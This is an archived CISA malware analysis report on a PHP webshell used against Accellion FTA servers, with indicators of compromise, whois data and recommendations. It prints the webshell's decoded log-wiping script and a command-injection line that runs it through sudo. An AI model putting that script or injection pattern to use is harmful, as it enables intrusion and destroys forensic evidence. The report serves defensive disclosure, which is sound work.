{
	"id": "1acfe385-cb00-4a94-9144-b6af41e2768b",
	"created_at": "2026-04-06T00:19:15.611866Z",
	"updated_at": "2026-04-10T13:11:28.979871Z",
	"deleted_at": null,
	"sha1_hash": "81de79bcb268a20bce9c617716203e7ac95912b0",
	"title": "MAR-10325064-1.v1 - Accellion FTA | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 80628,
	"plain_text": "MAR-10325064-1.v1 - Accellion FTA | CISA\r\nPublished: 2021-02-24 · Archived: 2026-04-05 17:36:01 UTC\r\nbody#cma-body { font-family: Franklin Gothic Medium, Franklin Gothic, ITC Franklin Gothic, Arial, sans-serif; font-size:\r\n15px; } table#cma-table { width: 900px; margin: 2px; table-layout: fixed; border-collapse: collapse; } div#cma-exercise {\r\nwidth: 900px; height: 30px; text-align: center; line-height: 30px; font-weight: bold; font-size: 18px; } div.cma-header { text-align: center; margin-bottom: 40px; } div.cma-footer { text-align: center; margin-top: 20px; } h2.cma-tlp { background-color: #000; color: #ffffff; width: 180px; height: 30px; text-align: center; line-height: 30px; font-weight: bold; font-size:\r\n18px; float: right; } span.cma-fouo { line-height: 30px; font-weight: bold; font-size: 16px; } h3.cma-section-title { font-size:\r\n18px; font-weight: bold; padding: 0 10px; margin-top: 10px; } h4.cma-object-title { font-size: 16px; font-weight: bold;\r\nmargin-left: 20px; } h5.cma-data-title { padding: 3px 0 3px 10px; margin: 10px 0 0 20px; background-color: #e7eef4; font-size: 15px; } p.cma-text { margin: 5px 0 0 25px !important; word-wrap: break-word !important; } div.cma-section { border-bottom: 5px solid #aaa; margin: 5px 0; padding-bottom: 10px; } div.cma-avoid-page-break { page-break-inside: avoid; }\r\ndiv#cma-summary { page-break-after: always; } div#cma-faq { page-break-after: always; } table.cma-content { border-collapse: collapse; margin-left: 20px; } table.cma-hashes { table-layout: fixed; width: 880px; } table.cma-hashes td{ width:\r\n780px; word-wrap: break-word; } .cma-left th { text-align: right; vertical-align: top; padding: 3px 8px 3px 20px;\r\nbackground-color: #f0f0f0; border-right: 1px solid #aaa; } .cma-left td { padding-left: 8px; } .cma-color-title th, .cma-color-list th, .cma-color-title-only th { text-align: left; padding: 3px 0 3px 20px; background-color: #f0f0f0; } .cma-color-title td,\r\n.cma-color-list td, .cma-color-title-only td { padding: 3px 20px; } .cma-color-title tr:nth-child(odd) { background-color:\r\n#f0f0f0; } .cma-color-list tr:nth-child(even) { background-color: #f0f0f0; } td.cma-relationship { max-width: 310px; word-wrap: break-word; } ul.cma-ul { margin: 5px 0 10px 0; } ul.cma-ul li { line-height: 20px; margin-bottom: 5px; word-wrap:\r\nbreak-word; } #cma-survey { font-weight: bold; font-style: italic; } div.cma-banner-container { position: relative; text-align:\r\ncenter; color: white; } img.cma-banner { max-width: 900px; height: auto; } img.cma-nccic-logo { max-height: 60px; width:\r\nauto; float: left; margin-top: -15px; } div.cma-report-name { position: absolute; bottom: 32px; left: 12px; font-size: 20px; }\r\ndiv.cma-report-number { position: absolute; bottom: 70px; right: 100px; font-size: 18px; } div.cma-report-date { position:\r\nabsolute; bottom: 32px; right: 100px; font-size: 18px; } img.cma-thumbnail { max-height: 100px; width: auto; vertical-align: top; } img.cma-screenshot { margin: 10px 0 0 25px; max-width: 800px; height: auto; vertical-align: top; border: 1px\r\nsolid #000; } div.cma-screenshot-text { margin: 10px 0 0 25px; } .cma-break-word { word-wrap: break-word; } .cma-tag {\r\nborder-radius: 5px; padding: 1px 10px; margin-right: 10px; } .cma-tag-info { background: #f0f0f0; } .cma-tag-warning {\r\nbackground: #ffdead; }\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) analyzes a malicious Hypertext Preprocessor (PHP) webshell file submitted to CISA\r\nfor analysis. The webshell is designed to be uploaded to an Accellion File Transfer Appliance (FTA) server, a secure file\r\ntransfer application used by customers to send large files. The webshell leverages a Structured Query Language (SQL)\r\ninjection vulnerability to install itself onto the impacted FTA server. The webshell provides threat actors with the ability to\r\nlocate files, obtain file metadata, and download files stored on the Accellion FTA server.\r\nThis webshell has been used in recent cyberattacks targeting users of Accellion FTA. For more information on these attacks,\r\nrefer to Joint Cybersecurity Advisory AA21-055A.\r\nFor a downloadable copy of IOCs, see: MAR-10325064-1.v1.stix.\r\nSubmitted Files (1)\r\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7 (about.html)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 1 of 13\n\nIPs (9)\r\n155.94.160.40\r\n192.52.167.101\r\n194.88.104.24\r\n197.156.107.83\r\n209.163.151.232\r\n209.58.189.165\r\n45.135.229.179\r\n79.141.162.82\r\n92.38.135.29\r\nFindings\r\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nTags\r\nwebshell\r\nDetails\r\nName about.html\r\nSize 3202 bytes\r\nType PHP script, ASCII text, with very long lines\r\nMD5 bdfd11b1b092b7c61ce5f02ffc5ad55a\r\nSHA1 9bbaf89be60a5c455ae5b14cbead82fce22f3b66\r\nSHA256 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nSHA512 8e9e1fd5d1798b519bb477050b0e817be7523b92715958446d4133f97923a1a6dc726c7d7009da6ecd3bf674e88ae428a45300cbe8f4b362\r\nssdeep 96:jh58DD+hpmEr4YkPdvrf50ZPbAmLkysSJBLUNf++m:GahpmErBmZrfKVsrysSJBz\r\nEntropy 5.641443\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n2e0df09fa3... Related_To 209.58.189.165\r\n2e0df09fa3... Related_To 197.156.107.83\r\n2e0df09fa3... Related_To 194.88.104.24\r\n2e0df09fa3... Related_To 45.135.229.179\r\n2e0df09fa3... Related_To 92.38.135.29\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 2 of 13\n\n2e0df09fa3... Related_To 155.94.160.40\r\n2e0df09fa3... Related_To 209.163.151.232\r\n2e0df09fa3... Related_To 79.141.162.82\r\n2e0df09fa3... Related_To 192.52.167.101\r\nDescription\r\nThe file, about.html, is a malicious Hypertext Preprocessor (PHP) webshell which leverages a SQL injection vulnerability to\r\ninstall itself onto the compromised Accellion FTA server. When the webshell is successfully installed, it provides threat\r\nactors the ability to download files stored on the FTA server.\r\nAnalysis indicates that the FTA server was compromised, which allows the threat actor the ability to craft an HTTP request\r\ndirectly to the webshell with commands that will be executed as if the threat actor had local (shell) access to the FTA server.\r\nWhen executed on the compromised FTA server, the webshell will attempt to check if the HTTP request accessing this\r\nresource includes the parameters, \"dwn\" and \"fn\" (Figure 2). If the two parameters are available in the HTTP request, then\r\nthe webshell will use the decrypt function to decrypt the contents of the original \"dwn\" parameter and store it in the value\r\nnamed \"$path\". It conducts the same process on the \"fn\" parameter and stores the value in the variable named \"$fname\". The\r\nwebshell checks if the file located at \"$path\" exists on the compromised FTA server. If the file exits, then the \"$path\" and\r\n\"$fname\" variables are used to call the readfile function to read and download the contents of the targeted file.\r\nNote: The encrypt and decrypt functions are undefined in the webshell, it's possible that both functions are included in either\r\none or two of the files referenced by the webshell, \"function.inc\" and \"remote.inc\".\r\nThe file checks if the HTTP request has the parameter \"csrftoken\" and the parameter has the value\r\n\"11454bd782bb41db213d415e10a0fb3c\" (Figure 3). If so, the webshell will use the clean_up function to delete itself from\r\nthe victim's system.\r\nThe clean_up function contains another function, file_put_contents. This function is used by the webshell to create the file\r\n\"/tmp/.scr\" and decode an encoded base64 string contained in the file (Figure 4).\r\nDisplayed below are the contents within the decoded base64 encoded string:\r\n--Begin decoded contents within the base64 encoded string--\r\n#!/bin/sh\r\nfor log in `ls /var/opt/apache/*log*`;do cat $log 2\u003e/dev/null | grep -v 'about.html' \u003e /tmp/x;mv /tmp/x $log;rm -rf\r\n/tmp/x;done\r\necho -n \u003e /home/seos/log/adminpl.log;\r\nrm -rf /home/httpd/html/about.html \u003e /tmp/.out\r\nrm -rfv /home/httpd/html/oauth.api \u003e /tmp/.out\r\nchmod 777 /tmp/.out\r\nchown nobody:nobody /tmp/.out\r\necho \u003e /var/log/secure\r\n--End decoded contents within the base64 encoded string--\r\nThe decoded content \"/tmp/.scr\" is a script file used by the webshell to evade detection and analysis. The script file is\r\ndesigned to iterate through all logs in \"/var/opt/apache/*log*\" on the victim's system and return all the results not pertaining\r\nto about.html and store them in \"/tmp/x\". This file is used to replace the original log file before removing the file \"/tmp/x\"\r\nfrom the victim's system. This will results in Apache logs that have been sterilized for references to about.html and hinders\r\nlog analysis capabilities.\r\nThe script file will attempt to remove \"/home.seos/courier/about.html\" and \"/home/seos/courier/oauth.api\" from the victim's\r\nsystem. Once these files are removed, it will redirects standard output to \"/tmp/.out\" before modifying its ownership and\r\npermissions making it more difficult to recover and analyze.\r\nThe script file is executed by invoking the Perl System function, which is used for executing arbitrary Unix commands on a\r\nsystem. The \"admin.pl\" is used to execute the script file.\r\nDisplayed below is the command used to execute the script file:\r\n--Begin command--\r\n@system('sudo /usr/local/bin/admin.pl --mount_cifs=AF,DF,\"\\'\\$(sh /tmp/.scr)\\'\",PASSWORD 1\u003e/dev/null 2\u003e/dev/null');\r\n--End command--\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 3 of 13\n\nThe script file \"/tmp/.scr\" and \"/tmp/.out\" will later be unlinked and deleted from the victim's system.\r\nIf the HTTP request does not match the parameters for downloading file contents (Figure 2) or performing the cleanup\r\nprocess (Figure 3), then the webshell expects to receive an application ID from the parameter aid obtained from the HTTP\r\nrequest (Figure 5). This application ID is used to open the associated database and execute a SQL command against it\r\n(Figure 6).\r\nThe cleanup mechanism is invoked to remove the webshell from the system and Apache logs only if the webshell returns no\r\nresults from the SQL query executed on the victim's system. If the webshell returns results from the SQL query executed on\r\nthe victim's system, then the results are returned to the webshell in a table (Figure 1). This technique allows the threat actor\r\nto manually download file contents or initiate the cleanup process by clicking on their respective links.\r\nDisplayed below are Indicators of Compromise (IOCs) related to this malicious webshell:\r\n--Begin file system artifacts contained in the webshell--\r\n/home/seos/courier/about.html\r\n/tmp/.scr\r\n/tmp/.out\r\n--End file system artifacts contained in the webshell--\r\n--Begin IP addresses--\r\n209.58.189.165\r\n197.156.107.83\r\n194.88.104.24\r\n45.135.229.179\r\n92.38.135.29\r\n155.94.160.40\r\n209.163.151.232\r\n79.141.162.82\r\n192.52.167.101\r\n--End IP addresses--\r\nThe URIs contains the following parameters (Figure 2\u00265):\r\n--Begin URIs parameters--\r\ndwn\r\nfn\r\naid\r\n--End URIs parameters--\r\nURIs contains the following parameter and its corresponding value (Figure 3):\r\n--Begin URIs parameter and value--\r\nparameter: csrftoken\r\nvalue: 11454bd782bb41db213d415e10a0fb3c\r\n--End URIs parameter and value--\r\nScreenshots\r\nFigure 1 - The webshell opened in a web browser. Note: The output of the webshell opened in a web browser is very\r\ndifferent since it was opened on a system without Accellion.\r\nFigure 2 - The webshell contains a functionality used to download targeted files from the FTA server. The webshell verifies\r\nif the HTTP request contains the parameters \"dwn\" and \"fn\" prior to downloading the targeted file.\r\nFigure 3 - The webshell checks if the HTTP request has the parameter \"csrftoken\" and a corresponding value\r\n\"11454bd782bb41db213d415e10a0fb3c\". If so, it uses the clean_up function to delete itself from the victim's system.\r\nFigure 4 - The webshell creates the script file \"/tmp/.scr\" and decodes an encoded base64 string contained in the script file.\r\nFigure 5 - The webshell uses the aid parameter to open associated database and execute a SQL command against it.\r\nFigure 6 - This is the SQL Command executed against the associated database.\r\n209.58.189.165\r\nTags\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 4 of 13\n\ncommand-and-control\r\nWhois\r\ninetnum:        209.58.184.0 - 209.58.191.255\r\nnetname:        LSW-HKG-10\r\ndescr:         LeaseWeb Asia Pacific - Hong Kong\r\ndescr:         Please send all abuse notifications to the following email address: abuse@sg.leaseweb.com. To ensure proper\r\nprocessing of your abuse notification, please visit the website www.leaseweb.com/abuse for notification requirements. All\r\npolice and other government agency requests must be sent to subpoenas@sg.leaseweb.com.\r\ncountry:        HK\r\nadmin-c:        LA249-AP\r\ntech-c:         LA249-AP\r\nabuse-c:        AL1457-AP\r\nstatus:         ALLOCATED NON-PORTABLE\r\nmnt-by:         MAINT-LSW-SG\r\nmnt-irt:        IRT-LSW-SG\r\nlast-modified: 2021-01-27T13:17:29Z\r\nsource:         APNIC\r\nirt:            IRT-LSW-SG\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ne-mail:         apnic@sg.leaseweb.com\r\nabuse-mailbox: abuse@sg.leaseweb.com\r\nadmin-c:        LAPP1-AP\r\ntech-c:         LAPP1-AP\r\nauth:         # Filtered\r\nremarks:        apnic@sg.leaseweb.com was validated on 2020-12-23\r\nremarks:        abuse@sg.leaseweb.com was validated on 2021-02-04\r\nmnt-by:         MAINT-LSW-SG\r\nlast-modified: 2021-02-04T12:48:04Z\r\nsource:         APNIC\r\nrole:         ABUSE LSWSG\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ncountry:        ZZ\r\nphone:         +000000000\r\ne-mail:         apnic@sg.leaseweb.com\r\nadmin-c:        LAPP1-AP\r\ntech-c:         LAPP1-AP\r\nnic-hdl:        AL1457-AP\r\nremarks:        Generated from irt object IRT-LSW-SG\r\nabuse-mailbox: abuse@sg.leaseweb.com\r\nmnt-by:         APNIC-ABUSE\r\nlast-modified: 2020-06-03T13:05:57Z\r\nsource:         APNIC\r\nperson:         LSW Apnic\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ncountry:        SG\r\nphone:         +6531587350\r\ne-mail:         apnic@sg.leaseweb.com\r\nnic-hdl:        LA249-AP\r\nmnt-by:         MAINT-LSW-SG\r\nlast-modified: 2016-06-06T08:59:04Z\r\nsource:         APNIC\r\n% Information related to '209.58.184.0/21AS133752'\r\nroute:         209.58.184.0/21\r\ndescr:         LeaseWeb Asia Pacific Hong Kong\r\norigin:         AS133752\r\nmnt-by:         MAINT-LSW-SG\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 5 of 13\n\nlast-modified: 2015-10-22T06:43:03Z\r\nsource:         APNIC\r\nRelationships\r\n209.58.189.165 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n197.156.107.83\r\nTags\r\ncommand-and-control\r\nWhois\r\ninetnum:        197.156.106.0 - 197.156.107.255\r\nnetname:        To_ERs_logically_close_to_MK-BR\r\ndescr:         To ERs logically close to MK-BR\r\ncountry:        ET\r\nadmin-c:        ET4-AFRINIC\r\ntech-c:         ETID1-AFRINIC\r\nstatus:         ASSIGNED PA\r\nmnt-by:         ETC-MNT\r\nsource:         AFRINIC # Filtered\r\nparent:         197.156.64.0 - 197.156.127.255\r\nperson:         Ethio Telecom\r\nnic-hdl:        ET4-AFRINIC\r\naddress:        Churchill Road\r\naddress:        Addis Ababa 1047\r\naddress:        Ethiopia\r\nphone:         tel:+251-91-151-0433\r\nphone:         tel:+251-91-152-4200\r\nphone:         tel:+251-91-150-8279\r\nphone:         tel:+251-91-150-9821\r\nphone:         tel:+251-91-151-0425\r\nphone:         tel:+251-91-150-9835\r\nmnt-by:         GENERATED-GRXPERJUPKL2DTQEXFFNEHRZHJZDFRJ7-MNT\r\nsource:         AFRINIC # Filtered\r\nperson:         Ethio Telecom IS Division\r\naddress:        Ethio telecom\r\naddress:        Legehar Information System division\r\naddress:        Addis Ababa, Ethiopia\r\naddress:        Addis Ababa\r\naddress:        Ethiopia\r\nphone:         tel:+251-91-125-6562\r\nfax-no:         tel:+251-11-552-3296\r\nnic-hdl:        ETID1-AFRINIC\r\nmnt-by:         GENERATED-ZPSFE1E8AGHQZZFKT4YYQSIX58FJ1MZ4-MNT\r\nsource:         AFRINIC # Filtered\r\n% Information related to '197.156.64.0/18AS24757'\r\nroute:         197.156.64.0/18\r\ndescr:         Ethio Telecom\r\norigin:         AS24757\r\nmember-of:     rs-ethiotelecom\r\nmnt-by:         ETC-MNT\r\nsource:         AFRINIC # Filtered\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 6 of 13\n\nRelationships\r\n197.156.107.83 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n194.88.104.24\r\nTags\r\ncommand-and-control\r\nRelationships\r\n194.88.104.24 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n45.135.229.179\r\nTags\r\ncommand-and-control\r\nWhois\r\ninetnum:        45.135.229.0 - 45.135.229.255\r\nnetname:        GCL-CUSTOMER-US\r\ndescr:         G-Core Labs Customer assignment\r\ncountry:        US\r\nadmin-c:        LA5122-RIPE\r\ntech-c:         LA5122-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         GCL1-MNT\r\ncreated:        2019-12-05T12:00:26Z\r\nlast-modified: 2019-12-05T12:00:26Z\r\nsource:         RIPE\r\ngeoloc:         38.747203 -77.531658\r\nperson:         LIR Admin\r\naddress:        G-Core Labs S.A.\r\naddress:        2A Rue Albert Borschette\r\naddress:        1246 Luxembourg\r\nphone:         +352-691-045488\r\ne-mail:         noc@gcore.lu\r\nnic-hdl:        LA5122-RIPE\r\nmnt-by:         WGI1-MNT\r\nmnt-by:         GCL1-MNT\r\ncreated:        2012-12-05T15:05:34Z\r\nlast-modified: 2015-12-10T08:56:40Z\r\nsource:         RIPE\r\n% Information related to '45.135.229.0/24AS199524'\r\nroute:         45.135.229.0/24\r\ndescr:         GCL-45-135-229-0-24\r\norigin:         AS199524\r\nmnt-by:         GCL1-MNT\r\ncreated:        2019-08-12T12:36:11Z\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 7 of 13\n\nlast-modified: 2019-08-12T12:36:11Z\r\nsource:         RIPE\r\nRelationships\r\n45.135.229.179 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n92.38.135.29\r\nTags\r\ncommand-and-control\r\nWhois\r\ninetnum:        92.38.134.0 - 92.38.135.255\r\nnetname:        GCL-CUSTOMER-KOREA\r\ndescr:         G-Core Labs Customer assignment\r\ncountry:        KR\r\norg:            ORG-WIG6-RIPE\r\nadmin-c:        LA5122-RIPE\r\ntech-c:         LA5122-RIPE\r\nmnt-by:         GCL1-MNT\r\nstatus:         ASSIGNED PA\r\ncreated:        2017-09-25T13:07:39Z\r\nlast-modified: 2017-09-25T13:07:39Z\r\nsource:         RIPE\r\ngeoloc:         37.534 126.991\r\norganisation: ORG-WIG6-RIPE\r\norg-name:     G-Core Labs S.A.\r\ncountry:        LU\r\norg-type:     LIR\r\naddress:        2A Rue Albert Borschette\r\naddress:        1246\r\naddress:        Luxembourg\r\naddress:        LUXEMBOURG\r\nphone:         +375293666245\r\ne-mail:         noc@gcore.lu\r\nabuse-c:        AC23417-RIPE\r\nmnt-ref:        GCL1-MNT\r\nmnt-ref:        RIPE-NCC-HM-MNT\r\nmnt-by:         GCL1-MNT\r\nmnt-by:         RIPE-NCC-HM-MNT\r\ncreated:        2012-12-05T13:21:56Z\r\nlast-modified: 2020-12-16T14:53:47Z\r\nsource:         RIPE\r\nperson:         LIR Admin\r\naddress:        G-Core Labs S.A.\r\naddress:        2A Rue Albert Borschette\r\naddress:        1246 Luxembourg\r\nphone:         +352-691-045488\r\ne-mail:         noc@gcore.lu\r\nnic-hdl:        LA5122-RIPE\r\nmnt-by:         WGI1-MNT\r\nmnt-by:         GCL1-MNT\r\ncreated:        2012-12-05T15:05:34Z\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 8 of 13\n\nlast-modified: 2015-12-10T08:56:40Z\r\nsource:         RIPE\r\n% Information related to '92.38.135.0/24AS199524'\r\nroute:         92.38.135.0/24\r\ndescr:         GCL-92-38-135\r\norigin:         AS199524\r\nmnt-by:         GCL1-MNT\r\ncreated:        2017-07-31T09:22:46Z\r\nlast-modified: 2017-07-31T09:22:46Z\r\nsource:         RIPE\r\n% Information related to '92.38.135.0/24AS202422'\r\nroute:         92.38.135.0/24\r\ndescr:         GCL-92-38-135-0-24\r\norigin:         AS202422\r\nmnt-by:         GCL1-MNT\r\ncreated:        2019-06-26T15:14:58Z\r\nlast-modified: 2019-06-26T15:14:58Z\r\nsource:         RIPE\r\nRelationships\r\n92.38.135.29 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n155.94.160.40\r\nTags\r\ncommand-and-control\r\nWhois\r\nNetRange:     155.94.160.0 - 155.94.160.255\r\nCIDR:         155.94.160.0/24\r\nNetName:        QN-246326932\r\nNetHandle:     NET-155-94-160-0-1\r\nParent:         QUADRANET (NET-155-94-128-0-1)\r\nNetType:        Reassigned\r\nOriginAS:    \r\nCustomer:     myserverplanet ltd (C05467676)\r\nRegDate:        2014-11-24\r\nUpdated:        2014-11-24\r\nComment:        Abuse: abuse@quadranet.com\r\nRef:            https://rdap.arin.net/registry/ip/155.94.160.0\r\nCustName:     myserverplanet ltd\r\nAddress:        117 E. First Street\r\nCity:         Monticello\r\nStateProv:     IA\r\nPostalCode:     52310\r\nCountry:        US\r\nRegDate:        2014-11-24\r\nUpdated:        2018-08-30\r\nRef:            https://rdap.arin.net/registry/entity/C05467676\r\nOrgTechHandle: QNO6-ARIN\r\nOrgTechName: QuadraNet Network Operations\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 9 of 13\n\nOrgTechPhone: +1-213-614-9371\r\nOrgTechEmail: support@quadranet.com\r\nOrgTechRef:    https://rdap.arin.net/registry/entity/QNO6-ARIN\r\nOrgAbuseHandle: QUADR4-ARIN\r\nOrgAbuseName: QuadraNet Abuse\r\nOrgAbusePhone: +1-213-614-8371\r\nOrgAbuseEmail: abuse@quadranet.com\r\nOrgAbuseRef:    https://rdap.arin.net/registry/entity/QUADR4-ARI\r\nRelationships\r\n155.94.160.40 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n209.163.151.232\r\nTags\r\ncommand-and-control\r\nWhois\r\nNetRange:     209.163.151.0 - 209.163.151.255\r\nCIDR:         209.163.151.0/24\r\nNetName:        TWTC-DIGDEF-01\r\nNetHandle:     NET-209-163-151-0-1\r\nParent:         TWTC-NETBLK-12 (NET-209-163-128-0-1)\r\nNetType:        Reassigned\r\nOriginAS:    \r\nOrganization: DIGITAL DEFENSE INCORPORATED (DIGIT-45)\r\nRegDate:        2004-03-31\r\nUpdated:        2009-08-31\r\nRef:            https://rdap.arin.net/registry/ip/209.163.151.0\r\nOrgName:        DIGITAL DEFENSE INCORPORATED\r\nOrgId:         DIGIT-45\r\nAddress:        1711 CITADEL PLAZA\r\nCity:         SAN ANTONIO\r\nStateProv:     TX\r\nPostalCode:     78209\r\nCountry:        US\r\nRegDate:        2004-03-31\r\nUpdated:        2017-11-06\r\nRef:            https://rdap.arin.net/registry/entity/DIGIT-45\r\nRelationships\r\n209.163.151.232 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n79.141.162.82\r\nTags\r\ncommand-and-control\r\nWhois\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 10 of 13\n\ninetnum:        79.141.162.0 - 79.141.163.255\r\nnetname:        HZ-NA23\r\ncountry:        US\r\nadmin-c:        VD3206-RIPE\r\ntech-c:         VD3206-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         HZ-HOSTING-LTD\r\ncreated:        2018-08-03T14:27:37Z\r\nlast-modified: 2018-08-03T14:27:37Z\r\nsource:         RIPE\r\nnic-hdl:        VD3206-RIPE\r\nmnt-by:         HZ-HOSTING-LTD\r\ncreated:        2016-11-28T15:25:07Z\r\nlast-modified: 2016-11-28T15:25:07Z\r\nsource:         RIPE\r\nRelationships\r\n79.141.162.82 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n192.52.167.101\r\nTags\r\ncommand-and-control\r\nWhois\r\nNetRange:     192.52.166.0 - 192.52.167.255\r\nCIDR:         192.52.166.0/23\r\nNetName:        CROWNCLOUD01\r\nNetHandle:     NET-192-52-166-0-1\r\nParent:         NET192 (NET-192-0-0-0-0)\r\nNetType:        Direct Allocation\r\nOriginAS:     AS29761\r\nOrganization: Crowncloud US LLC (CUL-34)\r\nRegDate:        2014-10-14\r\nUpdated:        2014-10-16\r\nComment:        Addresses in this block are statically assigned. Send abuse reports if any to admin@crowncloud.us\r\nRef:            https://rdap.arin.net/registry/ip/192.52.166.0\r\nOrgName:        Crowncloud US LLC\r\nOrgId:         CUL-34\r\nAddress:        530 W 6th St\r\nAddress:        C/O Cid 4573 Quadranet Inc. Ste 901\r\nCity:         Los Angeles\r\nStateProv:     CA\r\nPostalCode:     90014-1207\r\nCountry:        US\r\nRegDate:        2014-07-25\r\nUpdated:        2017-10-10\r\nRef:            https://rdap.arin.net/registry/entity/CUL-34\r\nOrgAbuseHandle: CROWN9-ARIN\r\nOrgAbuseName: Crowncloud Support\r\nOrgAbusePhone: +1-940-867-4072\r\nOrgAbuseEmail: admin@crowncloud.us\r\nOrgAbuseRef:    https://rdap.arin.net/registry/entity/CROWN9-ARIN\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 11 of 13\n\nOrgTechHandle: CROWN9-ARIN\r\nOrgTechName: Crowncloud Support\r\nOrgTechPhone: +1-940-867-4072\r\nOrgTechEmail: admin@crowncloud.us\r\nOrgTechRef:    https://rdap.arin.net/registry/entity/CROWN9-ARIN\r\nRelationships\r\n192.52.167.101 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\nRelationship Summary\r\n2e0df09fa3... Related_To 209.58.189.165\r\n2e0df09fa3... Related_To 197.156.107.83\r\n2e0df09fa3... Related_To 194.88.104.24\r\n2e0df09fa3... Related_To 45.135.229.179\r\n2e0df09fa3... Related_To 92.38.135.29\r\n2e0df09fa3... Related_To 155.94.160.40\r\n2e0df09fa3... Related_To 209.163.151.232\r\n2e0df09fa3... Related_To 79.141.162.82\r\n2e0df09fa3... Related_To 192.52.167.101\r\n209.58.189.165 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n197.156.107.83 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n194.88.104.24 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n45.135.229.179 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n92.38.135.29 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n155.94.160.40 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n209.163.151.232 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n79.141.162.82 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n192.52.167.101 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 12 of 13\n\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 